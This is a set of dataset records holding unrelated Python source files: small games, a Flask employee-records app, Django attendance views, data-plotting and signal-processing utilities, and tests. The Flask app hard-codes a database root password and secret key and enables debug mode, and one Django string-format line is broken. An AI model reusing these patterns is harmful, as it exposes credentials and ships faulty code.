return board[2]\r\n\r\n return\r\n\r\n\r\ndef check_tie():\r\n global game_active\r\n\r\n if \"-\" not in board:\r\n game_active=False\r\n \r\n return\r\n\r\n\r\ndef change_player():\r\n global current\r\n\r\n if current==\"X\":\r\n current=\"O\"\r\n\r\n elif current==\"O\":\r\n current=\"X\"\r\n return\r\n\r\ndef get_players():\r\n global player1,player2\r\n player1=input(\"Enter name of player 1 : \")\r\n player2=input(\"Enter name of player 2 : \")\r\n print(player1,\" is X\")\r\n print(player2,\" is O\")\r\n\r\n\r\nplay_game()","sub_path":"game2.py","file_name":"game2.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"434257105","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.secret_key = \"Secret Key\"\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:password123@localhost/employees'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n#initializing database\ndb = SQLAlchemy(app)\n\n#database model -> database table creation\nclass employees_data(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(150), nullable = False)\n address = db.Column(db.String(150), nullable = False)\n mobile = db.Column(db.String(20), nullable = False)\n email = db.Column(db.String(100), nullable = False, unique = True)\n sss = db.Column(db.String(15), nullable = False)\n pagibig = db.Column(db.String(15), nullable = False)\n philhealth = db.Column(db.String(15), nullable = False)\n hired = db.Column(db.Date, nullable = False)\n status = db.Column(db.String(150), nullable = False)\n remarks = db.Column(db.String(250), nullable = False)\n\n def __init__(self, id, name, address, mobile, email, sss, pagibig, philhealth, hired, status, remarks):\n self.id = id\n self.name = name\n self.address = address\n self.mobile = mobile\n self.email = email\n self.sss = sss\n self.pagibig = pagibig\n self.philhealth = philhealth\n self.hired = hired\n self.status = status\n self.remarks = remarks\n\n@app.route(\"/\")\ndef index():\n all_data = employees_data.query.all()\n return render_template(\"index.html\", employees = all_data)\n\n@app.route('/insert', methods = ['POST'])\ndef insert():\n if request.method == 'POST':\n id = request.form['id']\n name = request.form['name']\n address = request.form['address']\n mobile = request.form['mobile']\n email = request.form['email']\n sss = request.form['sss']\n pagibig = request.form['pagibig']\n philhealth = request.form['philhealth']\n hired = request.form['hired']\n status = request.form['status']\n remarks = request.form['remarks']\n\n my_data = employees_data(id, name, address, mobile, email, sss, pagibig, philhealth, hired, status, remarks)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Employee Inserted Successfully\")\n return redirect(url_for('index'))\n\n@app.route('/update', methods = ['GET', 'POST'])\ndef update():\n if request.method == 'POST':\n my_data = employees_data.query.get(request.form.get('id'))\n\n my_data.id = request.form['id']\n my_data.name = request.form['name']\n my_data.address = request.form['address']\n my_data.mobile = request.form['mobile']\n my_data.email = request.form['email']\n my_data.sss = request.form['sss']\n my_data.pagibig = request.form['pagibig']\n my_data.philhealth = request.form['philhealth']\n my_data.hired = 
request.form['hired']\n my_data.status = request.form['status']\n my_data.remarks = request.form['remarks']\n\n db.session.commit()\n\n flash(\"Employee Updated Successfully\")\n return redirect(url_for('index'))\n\n#error pages\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template(\"error.html\"), 404\n\n@app.errorhandler(500)\ndef page_not_found(e):\n return render_template(\"error.html\"), 500\n\nif __name__== \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"440696900","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect\nfrom .models import Asistencia, Motivo\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\nfrom apps.alumnos.models import Alumno\nfrom apps.cursos.models import Curso\nfrom django.views.generic import CreateView\nfrom django.views.generic import ListView\nfrom django.views.generic import DeleteView\nfrom django.views.generic import UpdateView\nfrom django.views.generic import TemplateView\nfrom django_datatables_view.base_datatable_view import BaseDatatableView\nfrom django.db.models import Q\nfrom django.conf import settings\n\nlogger = logging.getLogger(__name__)\n\nclass AsistenciaAlta(TemplateView):\n model = Asistencia\n success_url = '/asistencia/listado'\n template_name = 'asistencias/asistencia_ajax.html'\n\n def get_context_data(self, *args, **kwargs):\n extra_context = super(AsistenciaAlta, self).get_context_data(*args, **kwargs)\n extra_context = {\n \"alumnos_list\": Alumno.objects.filter(cursos__id=self.kwargs['pk']),\n \"motivos_list\": Motivo.objects.all(),\n \"cursos_list\": Curso.objects.all(),\n \"cur_list\": Motivo.objects.all(),\n }\n\n return extra_context\n\n def form_valid(self, form):\n self.object = form.save()\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass AsistenciaListado(ListView):\n model = Asistencia\n\n\nclass OrderListJson(BaseDatatableView):\n model = Asistencia\n columns = ['id', 'alumno', 'fecha', 'motivo']\n order_columns = ['id', 'alumno', 'fecha', 'motivo']\n max_display_length = 100\n pre_camel_case_notation = False\n\n def initialize(self, *args, **kwargs):\n if 'iSortingCols' in self.request.REQUEST:\n self.pre_camel_case_notation = True\n\n def render_column(self, row, column):\n \"\"\" Renders a column on a row\n \"\"\"\n if hasattr(row, 'get_%s_display' % column):\n # It's a choice field\n text = getattr(row, 'get_%s_display' % column)()\n else:\n try:\n text = getattr(row, column)\n except AttributeError:\n obj = row\n for part in column.split('.'):\n if obj is None:\n break\n obj = getattr(obj, part)\n text = obj\n\n if hasattr(row, 'get_absolute_url'):\n if column == 'id':\n return '%s' % (row.get_absolute_url(), text)\n else:\n return '%s' % (text)\n else:\n return text\n\n def get_order_columns(self):\n \"\"\" Return list of columns used for ordering\n \"\"\"\n return self.order_columns\n\n def filter_queryset(self, qs):\n \"\"\" If search['value'] is provided then filter all searchable columns using istartswith\n \"\"\"\n if not self.pre_camel_case_notation:\n # get global search value\n search = self.request.GET.get('search[value]', None)\n col_data = self.extract_datatables_column_data()\n q = Q()\n for col_no, col in enumerate(col_data):\n # apply global search to all searchable columns\n if 
search and col['searchable']:\n q |= Q(**{'alumno__apellido__istartswith'.format(self.columns[col_no]): search})\n # column specific filter\n if col['search.value']:\n qs = qs.filter(**{'alumno__apellido__istartswith'.format(self.columns[col_no]): col['search.value']})\n qs = qs.filter(q)\n return qs\n\n def ordering(self, qs):\n \"\"\" Get parameters from the request and prepare order by clause\n \"\"\"\n request = self.request\n\n ## Number of columns that are used in sorting\n sorting_cols = 0\n if self.pre_camel_case_notation:\n try:\n sorting_cols = int(request.REQUEST.get('iSortingCols', 0))\n except ValueError:\n sorting_cols = 0\n else:\n sort_key = 'order[{0}][column]'.format(sorting_cols)\n while sort_key in self.request.REQUEST:\n sorting_cols += 1\n sort_key = 'order[{0}][column]'.format(sorting_cols)\n\n order = []\n order_columns = self.get_order_columns()\n\n for i in range(sorting_cols):\n # sorting column\n sort_dir = 'asc'\n try:\n if self.pre_camel_case_notation:\n sort_col = int(request.REQUEST.get('iSortCol_{0}'.format(i)))\n # sorting order\n sort_dir = request.REQUEST.get('sSortDir_{0}'.format(i))\n else:\n sort_col = int(request.REQUEST.get('order[{0}][column]'.format(i)))\n # sorting order\n sort_dir = request.REQUEST.get('order[{0}][dir]'.format(i))\n except ValueError:\n sort_col = 0\n\n sdir = '-' if sort_dir == 'desc' else ''\n sortcol = order_columns[sort_col]\n\n if isinstance(sortcol, list):\n for sc in sortcol:\n order.append('{0}{1}'.format(sdir, sc.replace('.', '__')))\n else:\n order.append('{0}{1}'.format(sdir, sortcol.replace('.', '__')))\n\n if order:\n return qs.order_by(*order)\n return qs\n\n def get_initial_queryset(self):\n if not self.model:\n raise NotImplementedError(\"Need to provide a model or implement get_initial_queryset!\")\n return self.model.objects.all()\n\n def prepare_results(self, qs):\n data = []\n for item in qs:\n #item.dni = item.get_absolute_url()\n data.append([self.render_column(item, column) for column in self.get_columns()])\n return data\n\n def get_context_data(self, *args, **kwargs):\n request = self.request\n try:\n self.initialize(*args, **kwargs)\n\n qs = self.get_initial_queryset()\n\n # number of records before filtering\n total_records = qs.count()\n\n qs = self.filter_queryset(qs)\n\n # number of records after filtering\n total_display_records = qs.count()\n\n qs = self.ordering(qs)\n qs = self.paging(qs)\n\n # prepare output data\n if self.pre_camel_case_notation:\n aaData = self.prepare_results(qs)\n\n ret = {'sEcho': int(request.REQUEST.get('sEcho', 0)),\n 'iTotalRecords': total_records,\n 'iTotalDisplayRecords': total_display_records,\n 'aaData': aaData\n }\n else:\n data = self.prepare_results(qs)\n\n ret = {'draw': int(request.REQUEST.get('draw', 0)),\n 'recordsTotal': total_records,\n 'recordsFiltered': total_display_records,\n 'data': data\n }\n except Exception as e:\n logger.exception(str(e))\n\n if settings.DEBUG:\n import sys\n from django.views.debug import ExceptionReporter\n reporter = ExceptionReporter(None, *sys.exc_info())\n text = \"\\n\" + reporter.get_traceback_text()\n else:\n text = \"\\nAn error occured while processing an AJAX request.\"\n\n if self.pre_camel_case_notation:\n ret = {'result': 'error',\n 'sError': text,\n 'text': text,\n 'aaData': [],\n 'sEcho': int(request.REQUEST.get('sEcho', 0)),\n 'iTotalRecords': 0,\n 'iTotalDisplayRecords': 0, }\n else:\n ret = {'error': text,\n 'data': [],\n 'recordsTotal': 0,\n 'recordsFiltered': 0,\n 'draw': int(request.REQUEST.get('draw', 0))}\n 
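# NOTE: the two payload shapes above mirror the DataTables wire formats:\n        # the legacy 1.9 protocol (sEcho/iTotalRecords/iTotalDisplayRecords/aaData)\n        # and the 1.10+ protocol (draw/recordsTotal/recordsFiltered/data)\n        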
return ret\n\n\n\nclass AsistenciaBaja(DeleteView):\n    model = Asistencia\n    success_url = '/asistencia/listado'\n\n\nclass AsistenciaModi(UpdateView):\n    template_name = 'asistencias/asistencia_form.html'\n    model = Asistencia\n    success_url = '/asistencia/listado'\n\n\nclass Alumnos(TemplateView):\n\n    def post(self, request, *args, **kwargs):\n        alumnos = request.POST['alumnos_list']\n        alumnos_list = alumnos.split()\n        fecha_list = request.POST['id_fecha'].split(\"/\")\n        fecha_post = str(fecha_list[2]) + \"-\" + str(fecha_list[1]) + \"-\" + str(fecha_list[0])\n        motivo_post = request.POST['id_motivo']\n        for alumno in alumnos_list:\n            Asistencia.objects.create(\n                alumno=Alumno.objects.get(pk=alumno),\n                fecha=fecha_post,\n                motivo=Motivo.objects.get(pk=motivo_post)\n            )\n\n        return redirect('/asistencia/listado/')","sub_path":"apps/asistencias/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"43962588","text":"scelta=0\nn_task=0\ntask=[]\nfrom sys import argv\nfp= argv[1]\ntxt= open(fp)\nfor strng in txt.read().splitlines():\n    task.append(strng)\n    n_task+=1\nwhile scelta!=4:\n    print(\"Task Manager\")\n    print(\"1. Insert a new task (a string of text)\")\n    print(\"2. Remove a task (by typing a substring of its content)\")\n    print(\"3. Show all existing tasks, sorted in alphabetic order\")\n    print(\"4. Close the program\")\n    scelta=int(input(\"Make your choice: \"))\n    if(scelta==1):\n        task.append(input(\"Insert task's content: \"))\n        n_task+=1\n    elif(scelta==2):\n        if(n_task<=0):\n            print(\"No tasks\")\n        else:\n            ctrl= input(\"Insert task's substring: \")\n            for strng in task[:]:  # iterate over a copy: removing while iterating skips items\n                if ctrl in strng:\n                    task.remove(strng)\n                    n_task-=1\n    elif(scelta==3):\n        if (n_task <= 0):\n            print(\"No tasks\")\n        else:\n            print(sorted(task))\n    elif(scelta==4):\n        print(\"The End\")\n        txt.close()\n        txt= open(fp, \"w\")\n        for strng in task:\n            txt.write(strng+\"\\n\")\n        txt.close()","sub_path":"python_file3.py","file_name":"python_file3.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256814454","text":"from copy import deepcopy\n\nfrom d3graph import d3graph\n\n\ndef test_instantiate_d3graph_no_args() -> None:\n    \"\"\"Test instantiation works with defaults\"\"\"\n    d3 = d3graph()\n    assert isinstance(d3, type(d3graph()))\n\n\ndef test_clean(d3, helpers) -> None:\n    \"\"\"Test _clean method deletes the attributes in clean_fields\"\"\"\n    clean_fields: tuple = ('adjmat', 'config', 'edge_properties', 'G', 'node_properties')\n\n    # Set attrs to dummy value (i.e., 0) and assert they exist in the object\n    original_attrs = {field: 0 for field in clean_fields}\n    d3_og = helpers.setattrs(obj=d3, **original_attrs)\n\n    # Make a copy of the object and apply _clean()\n    d3_new = deepcopy(d3_og)\n    d3_new._clean()\n\n    assert len([attr for attr in vars(d3_og) if attr in clean_fields]) == len(clean_fields)\n    assert all(isinstance(i, int) for i in map(vars(d3_og).get, clean_fields))\n    assert not [attr for attr in vars(d3_new) if attr in clean_fields]\n    assert not any(hasattr(d3_new, attr) for attr in vars(d3_new) if attr in clean_fields)\n    \n","sub_path":"tests/test_d3graph.py","file_name":"test_d3graph.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"83585420","text":"class user:\n    def __init__(self,name,email,account_balance=0): #any parameter 
without a default value is mandatory and must be provided when creating a new user; a parameter with a default value is optional, and if no value is passed the default is used.\n        self.name=name\n        self.email=email\n        self.account_balance=account_balance\n    def make_deposite (self, amount):\n        self.account_balance+=amount\n    def make_withdrawal(self, amount=0):\n        if amount <= self.account_balance:\n            self.account_balance-=amount\n            return True\n        return False \n    def display_user_balance(self):\n        print(\"User Name: \"+self.name +\", User Balance: \"+ str(self.account_balance))\n    def transfer_money(self, other_user, amount):\n        if self.make_withdrawal(amount):\n            other_user.make_deposite(amount)\n            return True\n        return False \n\nsahar =user(\"sahar\", \"murrarsahar@gmail.com\", 1200)\nsahar.make_deposite(500)\nsahar.display_user_balance()\nmomen = user(\"momen\", \"user2@gmial.com\", 2000)\nsahar.transfer_money(momen, 400)\n\nsahar.display_user_balance()\nmomen.display_user_balance()","sub_path":"_python/OOP/User/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"617476490","text":"import numpy as np\n\n\ndef compute_angle_weights_1d(angles):\n    \"\"\"\n    Compute the weight for each angle according to the distance between its\n    neighbors.\n    Parameters\n    ----------\n    angles: 1d ndarray of length A\n        Angles in radians\n    Returns\n    -------\n    weights: 1d ndarray of length A\n        The weights for each angle\n    Notes\n    -----\n    To compute the weights, the angles are set modulo PI, not modulo 2PI.\n    This reduces artifacts when the angular coverage is between PI and 2PI\n    but does not affect the result when the angles cover the full 2PI interval.\n    \"\"\"\n    # copy and modulo np.pi\n    # This is an array with values in [0, np.pi)\n    angles = (angles.flatten() - angles.min()) % (np.pi)\n    # sort the array\n    sortargs = np.argsort(angles)\n    sortangl = angles[sortargs]\n    # compute weights for sorted angles\n    da = (np.roll(sortangl, -1) - np.roll(sortangl, 1)) % (np.pi)\n    weights = da/np.sum(da)*da.shape[0]\n\n    unsortweights = np.zeros_like(weights)\n    # Sort everything back where it belongs\n    unsortweights[sortargs] = weights\n    return unsortweights\n","sub_path":"odtbrain/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"222232029","text":"from matplotlib.pylab import plt\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\n\nimport matplotlib.patches as patches\n\nimport plotly.figure_factory as ff\n\nimport matplotlib._color_data as mcd\nimport matplotlib.dates as mdates\nfrom IPython.display import display\n\n\ndef displaycontent(dataset):\n    if not (hasattr(dataset, 'sensor_events')):\n        return\n    print('sensor events:')\n    display(dataset.sensor_events.iloc[20:25])\n    print('activity_events:')\n    display(dataset.activity_events.loc[1:1])\n    print('sensor_desc:')\n    display(dataset.sensor_desc.iloc[1:3])\n    print(\"Activities: \", dataset.activities)\n    for a, v in dataset.activities_map.items():\n        items = dataset.activity_events.loc[dataset.activity_events['Activity'] == a]['Duration']\n        # print(a,v)\n        # display(items.describe())\n        print(a, v, '\\t--> count=', items.count(), ' avg duration=', str(items.mean()))\n    x = dataset.activity_events.copy()\n    x['Duration'] = 
x['Duration'].dt.seconds\n x.boxplot(by='Activity', column='Duration')\n\n\n# loadA4HDataSet()\n# loadVanKasterenDataset()\n# loadKaryoAdlNormalDataset();\n# display()\n\n\ndef view(dataset, i):\n if not (hasattr(dataset, 'sensor_events')):\n return\n tmp_act_evants = dataset.activity_events.loc[dataset.activity_events['Activity'] == i]\n\n print(dataset.activities_map[i])\n print(tmp_act_evants['Duration'].describe())\n if len(tmp_act_evants) == 0:\n return\n\n fig = plt.figure()\n\n tmp_act_evants['StartTime'].iloc[0]\n all = pd.DataFrame()\n for index, row in tmp_act_evants.iterrows():\n myse = dataset.sensor_events.loc[(dataset.sensor_events['time'] >= row['StartTime']) & (dataset.sensor_events['time'] <= row['EndTime'])].copy()\n myse['relative'] = dataset.sensor_events['time'] - row['StartTime']\n myse['hit time'] = myse['relative'] / row['Duration']\n all = pd.concat([all, myse[['hit time', 'SID']]])\n # plt.scatter(myse['hit time'],myse['SID'])\n\n tmp = all.copy()\n\n tmp['hit time'] = (tmp['hit time'] * 2).round(0) / 2\n fig = plt.figure(figsize=(10, 5))\n a = pd.pivot_table(tmp, columns='hit time', index='SID', aggfunc=np.count_nonzero, fill_value=0)\n a = a / a.max()\n # plt.imshow(a, cmap='hot', interpolation='nearest')\n ax = plt.axes()\n sns.heatmap(a / a.max(), cmap=sns.cm.rocket_r, ax=ax)\n ax.set_title(dataset.activities_map[i])\n\n\n# view(5)\n\n\ndef plotAct(dataset, acts):\n firstacts = acts.iloc[0]\n acts = acts.loc[acts['StartTime'] < firstacts['StartTime'] + pd.Timedelta('7d')]\n lastact = acts.iloc[-1]\n lastactinDay = acts.loc[acts['StartTime'] < firstacts['StartTime'] + pd.Timedelta('20h')].iloc[-1]\n\n # for a in dataset.activities:\n # acts = acts.append({\n # 'Activity': dataset.activities_map_inverse[a],\n # 'StartTime': firstacts['StartTime'],\n # 'EndTime': firstacts['StartTime']\n # },\n # ignore_index=True)\n\n acts = acts.sort_values(by='Activity')\n\n df2 = acts.apply(lambda x: dict(Task=dataset.activities_map[x.Activity], Color=0, Start=x.StartTime, Finish=x.EndTime), axis=1).tolist()\n # configure_plotly_browser_state()\n # init_notebook_mode(connected=False)\n # fig=ff.create_gantt(df2, index_col='Color', group_tasks=True)\n\n fig = ff.create_gantt(df2, group_tasks=True)\n fig['layout'].update(margin=dict(l=150))\n fig['layout'].update(xaxis=dict(range=[firstacts['StartTime'], lastactinDay['EndTime']],\n rangeselector=dict(buttons=list([\n dict(count=4, label='4h', step='hour', stepmode='backward'),\n dict(count=6, label='6h', step='hour', stepmode='backward'),\n dict(count=8, label='8h', step='hour', stepmode='backward'),\n dict(count=10, label='10h', step='hour', stepmode='backward'),\n dict(count=12, label='12h', step='hour', stepmode='backward'),\n dict(count=1, label='1d', step='day', stepmode='backward'),\n dict(count=5, label='5d', step='day', stepmode='backward'),\n dict(step='all')\n ])),\n rangeslider=dict(\n visible=True,\n range=[firstacts['StartTime'], lastact['EndTime']],\n )))\n\n fig.show()\n\n\ndef sensor_hitmap(dataset):\n if not (hasattr(dataset, 'sensor_events')):\n return\n actscount = len(dataset.activities)\n import matplotlib.pyplot as plt\n\n fig, subplots = plt.subplots((actscount - 1) // 4 + 1, 4, sharex=True, sharey=True,figsize=(10,12))\n subplots = subplots.reshape(-1)\n for i in dataset.activities_map:\n tmp_act_evants = dataset.activity_events.loc[dataset.activity_events['Activity'] == i]\n\n # print(dataset.activities_map[i])\n # print(tmp_act_evants['Duration'].describe())\n if len(tmp_act_evants) == 0:\n 
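# no annotated events for this activity; skip its heatmap\n            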
continue\n\n # fig = plt.figure()\n\n # tmp_act_evants['StartTime'].iloc[0]\n all = pd.DataFrame()\n for index, row in tmp_act_evants.iterrows():\n myse = dataset.sensor_events.loc[(dataset.sensor_events['time'] >= row['StartTime']) & (dataset.sensor_events['time'] <= row['EndTime'])].copy()\n myse['relative'] = dataset.sensor_events['time'] - row['StartTime']\n myse['hit time'] = myse['relative'] / row['Duration']\n all = pd.concat([all, myse[['hit time', 'SID']]])\n # plt.scatter(myse['hit time'],myse['SID'])\n\n tmp = all.copy()\n\n tmp['hit time'] = (tmp['hit time'] * 2).round(0) / 2\n fig = plt.figure(figsize=(10, 5))\n a = pd.pivot_table(tmp, columns='hit time', index='SID', aggfunc=np.count_nonzero, fill_value=0)\n a = a / a.max()\n # plt.imshow(a, cmap='hot', interpolation='nearest')\n ax = subplots[i]\n sns.heatmap(a / a.max(), cmap=sns.cm.rocket_r, ax=ax)\n ax.set_title(dataset.activities_map[i])\n","sub_path":"result_analyse/dataset_viewer.py","file_name":"dataset_viewer.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"31026932","text":"import os\nimport signal\nimport deeplift\nimport numpy as np\nimport deeplift.backend as B\nimport theano\nimport theano.tensor.signal.conv\nimport h5py\nimport traceback\ndef create_detector_from_subset_of_sequential_layers(sequential_container,\n idx_of_layer_of_interest,\n channel_indices,\n multipliers_on_channels):\n layers = [] \n #this adds in all the layers preceeding idx_of_layer_of_interest\n #(remember zero-based indexing...)\n for layer_idx in range(idx_of_layer_of_interest):\n layers.append(\n sequential_container.get_layers()[layer_idx].copy_blob_keep_params()\n )\n #add in the layer of interest, but with the channels subsetted to\n #the channels of interest\n layer_to_subset = sequential_container.get_layers()\\\n [idx_of_layer_of_interest]\n assert hasattr(layer_to_subset, \"W\"), \"Layer does not have weights - \"\\\n +\" make sure you have supplied the correct index for the conv layer?\"\n subsetted_weights = layer_to_subset.W[channel_indices]\n subsetted_biases = layer_to_subset.b[channel_indices]\n layer_kwargs = layer_to_subset.get_yaml_compatible_object_kwargs()\n layer_kwargs['W'] = subsetted_weights \n layer_kwargs['b'] = subsetted_biases\n subsetted_layer = layer_to_subset.\\\n load_blob_from_yaml_contents_only(**layer_kwargs)\n layers.append(subsetted_layer)\n #check if the next layer is an activation layer\n layer_after_layer_of_interest =\\\n sequential_container.get_layers()[idx_of_layer_of_interest+1]\n if isinstance(layer_after_layer_of_interest, deeplift.blobs.Activation):\n layers.append(layer_after_layer_of_interest.copy_blob_keep_params())\n #multipliers_layer = sequential_container.get_layers()[layer_idx+1].copy_blob_keep_params()\n #add in a layer with a conv filter that is the multipliers\n #need to be reversed because this is doing a convolution, not cross corr\n multipliers_layer = deeplift.blobs.Conv2D(\n name=\"multipliers_layer\",\n W=multipliers_on_channels[:,:,::-1,::-1].astype('float32'),\n b=np.zeros(multipliers_on_channels.shape[0])\\\n .astype('float32'),\n strides=(1,1), \n border_mode=B.BorderMode.valid)\n layers.append(multipliers_layer)\n deeplift.util.connect_list_of_layers(layers)\n layers[-1].build_fwd_pass_vars()\n model_to_return = deeplift.models.SequentialModel(layers=layers)\n model_to_return.get_layers()\n return model_to_return\ndef get_conv_out_symbolic_var(input_var,\n 
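# NOTE: theano's conv2d below performs a true convolution; callers that\n                              # want a cross-correlation pre-flip the patterns (see get_max_cross_corr)\n                              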
set_of_2d_patterns_to_conv_with,\n normalise_by_magnitude,\n take_max,\n mode='full'):\n assert len(set_of_2d_patterns_to_conv_with.shape)==3\n if (normalise_by_magnitude):\n set_of_2d_patterns_to_conv_with =\\\n set_of_2d_patterns_to_conv_with/\\\n (np.sqrt(np.sum(np.sum(np.square(set_of_2d_patterns_to_conv_with),\n axis=-1),\n axis=-1))[:,None,None])\n set_of_2d_patterns_to_conv_with = np.expand_dims(set_of_2d_patterns_to_conv_with, 1)\n filters = theano.tensor.as_tensor_variable(\n x=set_of_2d_patterns_to_conv_with,\n name=\"filters\")\n conv_out = theano.tensor.nnet.conv2d(\n input=input_var,\n filters=filters,\n border_mode=mode)\n if (normalise_by_magnitude):\n sum_squares_per_pos =\\\n theano.tensor.nnet.conv2d(\n input=theano.tensor.square(input_var),\n filters=np.ones(set_of_2d_patterns_to_conv_with.shape)\\\n .astype(\"float32\"),\n border_mode=mode) \n per_pos_magnitude = theano.tensor.sqrt(sum_squares_per_pos)\n per_pos_magnitude += 0.0000001*(per_pos_magnitude < 0.0000001)\n conv_out = conv_out/per_pos_magnitude\n if (take_max):\n conv_out = theano.tensor.max(\n theano.tensor.max(conv_out, axis=-1), #max over cols\n axis=-1) #max over rows\n return conv_out \ndef compile_conv_func_with_theano(set_of_2d_patterns_to_conv_with,\n normalise_by_magnitude=False,\n take_max=False,\n mode='full'):\n # input_var = theano.tensor.TensorType(dtype=theano.config.floatX,\n # broadcastable=[False]*3)(\"input\")\n input_var = theano.tensor.TensorType(dtype=theano.config.floatX,\n broadcastable=[False, True, False, False])(\"input\")\n conv_out = get_conv_out_symbolic_var(input_var,\n set_of_2d_patterns_to_conv_with,\n normalise_by_magnitude=normalise_by_magnitude,\n take_max=take_max,\n mode=mode)\n func = theano.function([input_var],\n conv_out,\n allow_input_downcast=True)\n return func \ndef get_max_cross_corr(filters, things_to_scan,\n verbose=True, batch_size=10,\n func_params_size=1000000,\n progress_update=1000,\n min_overlap=0.3):\n \"\"\"\n func_params_size: when compiling functions\n \"\"\"\n #reverse the patterns as the func is a conv not a cross corr\n filters = filters.astype(\"float32\")[:,::-1,::-1]\n to_return = np.zeros((filters.shape[0], len(things_to_scan)))\n #compile the number of filters that result in a function with\n #params equal to func_params_size \n params_per_filter = np.prod(filters[0].shape)\n filter_batch_size = int(func_params_size/params_per_filter)\n filter_length = filters.shape[-1]\n filter_idx = 0 \n while filter_idx < filters.shape[0]:\n if (verbose):\n print(\"On filters\",filter_idx,\"to\",(filter_idx+filter_batch_size))\n filter_batch = filters[filter_idx:(filter_idx+filter_batch_size)]\n cross_corr_func = compile_conv_func_with_theano(\n set_of_2d_patterns_to_conv_with=filter_batch,\n normalise_by_magnitude=False,\n take_max=True) \n padding_amount = int((filter_length)*(1-min_overlap))\n padded_input = np.expand_dims(np.array([np.pad(array=x,\n pad_width=((padding_amount, padding_amount)),\n mode=\"constant\") for x in things_to_scan]), axis=1)\n max_cross_corrs = np.array(deeplift.util.run_function_in_batches(\n func=cross_corr_func,\n input_data_list=[padded_input],\n batch_size=batch_size,\n progress_update=(None if verbose==False else\n progress_update)))\n assert len(max_cross_corrs.shape)==2, max_cross_corrs.shape\n to_return[filter_idx:\n (filter_idx+filter_batch_size),:] =\\\n np.transpose(max_cross_corrs)\n filter_idx += filter_batch_size\n \n return to_return\ndef get_full_cross_corr(filters, things_to_scan,\n verbose=True, 
batch_size=10,\n func_params_size=1000000,\n progress_update=1000,\n min_overlap=1,\n mode='valid'):\n \"\"\"\n func_params_size: when compiling functions\n \"\"\"\n #reverse the patterns as the func is a conv not a cross corr\n filters = filters.astype(\"float32\")[:,::-1,::-1]\n # padding_amount0 = int((filters[0].shape[-1])*(1-min_overlap))\n if mode == 'valid':\n num_xcor_sites = things_to_scan[0].shape[-1]-filters[0].shape[-1]+1\n elif mode == 'full':\n num_xcor_sites = things_to_scan[0].shape[-1]+filters[0].shape[-1]-1 \n to_return = np.zeros((filters.shape[0], len(things_to_scan), num_xcor_sites))\n #compile the number of filters that result in a function with\n #params equal to func_params_size \n params_per_filter = np.prod(filters[0].shape)\n filter_batch_size = int(func_params_size/params_per_filter)\n filter_length = filters.shape[-1]\n filter_idx = 0 \n while filter_idx < filters.shape[0]:\n if (verbose):\n print(\"On filters\",filter_idx,\"to\",(filter_idx+filter_batch_size))\n filter_batch = filters[filter_idx:(filter_idx+filter_batch_size)]\n cross_corr_func = compile_conv_func_with_theano(\n set_of_2d_patterns_to_conv_with=filter_batch,\n normalise_by_magnitude=False,\n take_max=False,\n mode=mode) \n padding_amount = int((filter_length)*(1-min_overlap))\n padded_input = [np.pad(array=x,\n pad_width=((padding_amount, padding_amount)),\n mode=\"constant\") for x in things_to_scan]\n all_cross_corrs = np.array(deeplift.util.run_function_in_batches(\n func=cross_corr_func,\n input_data_list=[padded_input],\n batch_size=batch_size,\n progress_update=(None if verbose==False else\n progress_update)))\n all_cross_corrs_max = all_cross_corrs.max(axis=2)\n assert len(all_cross_corrs_max.shape)==3, all_cross_corrs_max.shape\n to_return[filter_idx:\n (filter_idx+filter_batch_size),:,:] =\\\n np.transpose(all_cross_corrs_max, axes=[1,0,2])\n filter_idx += filter_batch_size\n \n return to_return\n","sub_path":"deeplearn/scripts/modisco_util.py","file_name":"modisco_util.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"419295991","text":"#!/usr/bin/env python -i\n# -*- coding: utf-8 -*-\n\"\"\"Utilities for this package.\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\n\nimport axonius_api_client as axonapi\n\nif __name__ == \"__main__\":\n axonapi.cli.cli_constants.load_dotenv()\n\n AX_URL = os.environ[\"AX_URL\"]\n AX_KEY = os.environ[\"AX_KEY\"]\n AX_SECRET = os.environ[\"AX_SECRET\"]\n AX_CLIENT_CERT_BOTH = os.environ.get(\"AX_CLIENT_CERT_BOTH\", None) or None\n AX_CLIENT_CERT_CERT = os.environ.get(\"AX_CLIENT_CERT_CERT\", None) or None\n AX_CLIENT_CERT_KEY = os.environ.get(\"AX_CLIENT_CERT_KEY\", None) or None\n\n def jdump(obj, **kwargs):\n \"\"\"JSON dump utility.\"\"\"\n print(axonapi.tools.json_reload(obj, 